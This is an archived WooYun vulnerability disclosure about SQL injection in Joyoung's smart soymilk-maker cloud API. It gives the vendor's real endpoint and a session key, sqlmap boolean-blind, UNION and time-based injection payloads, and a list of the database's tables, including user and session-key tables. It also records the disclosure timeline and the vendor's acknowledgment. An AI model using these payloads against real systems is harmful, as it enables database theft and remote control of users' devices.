乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-06: 细节已通知厂商并且等待厂商处理中 2015-02-06: 厂商已经确认,细节仅向厂商公开 2015-02-16: 细节向核心白帽子及相关领域专家公开 2015-02-26: 细节向普通白帽子公开 2015-03-08: 细节向实习白帽子公开 2015-03-23: 细节向公众公开
九阳智能豆浆机云端注入漏洞可脱裤/远程控制豆浆机
注入点:http://api.joyoung.com:8089/ia/appapi/menu?param={"op_action":"queryMenuDetail","sessionkey":"f7f8013d53664f66ae6bc887eb7843d0","menuid":"3d1bf3337b374a238d11c52a1992d4ab"}
back-end DBMS: MySQL 5.0.11current database: 'rmsdb'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://api.joyoung.com:8089/ia/appapi/menu?param={"op_action":"queryMenuDetail","sessionkey":"f7f8013d53664f66ae6bc887eb7843d0","menuid":"3d1bf3337b374a238d11c52a1992d4ab' AND 3037=3037 AND 'eXzD'='eXzD"} Type: UNION query Title: MySQL UNION query (NULL) - 7 columns Payload: http://api.joyoung.com:8089/ia/appapi/menu?param={"op_action":"queryMenuDetail","sessionkey":"f7f8013d53664f66ae6bc887eb7843d0","menuid":"3d1bf3337b374a238d11c52a1992d4ab' UNION ALL SELECT CONCAT(0x717a627a71,0x69524b6e556761597a58,0x716b786b71),NULL,NULL,NULL,NULL#"} Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://api.joyoung.com:8089/ia/appapi/menu?param={"op_action":"queryMenuDetail","sessionkey":"f7f8013d53664f66ae6bc887eb7843d0","menuid":"3d1bf3337b374a238d11c52a1992d4ab' AND SLEEP(5) AND 'LprJ'='LprJ"}---back-end DBMS: MySQL 5.0.11Database: rmsdb[37 tables]+------------------------+| ia_app_version || ia_appusers || ia_appusers_filter || ia_command_jy_jd || ia_device_info || ia_device_info2 || ia_device_info_2ali || ia_device_info_2jd || ia_fileupload || ia_firmware_info || ia_getui_usermap || ia_menu_achievement || ia_menu_collect || ia_menu_discuss || ia_menu_image_ref || ia_menu_info || ia_menu_info_history || ia_menu_ingredients || ia_menu_nutrition || ia_menu_praise || ia_menu_process || ia_menu_tag || ia_menu_tag_ref || ia_oprecord || ia_pmodel_menu || ia_product_fault || ia_productline || ia_productmodel || ia_sessionkey || ia_user_configs || ia_user_dev || ia_user_feedback || ia_user_feedback_reply || ia_user_message || ia_user_vcode || ia_userdev_menu || operaterecord |+------------------------+
危害等级:高
漏洞Rank:20
确认时间:2015-02-06 15:23
感谢路人甲指出我们产品的安全缺陷,我们将尽快安排整改。
暂无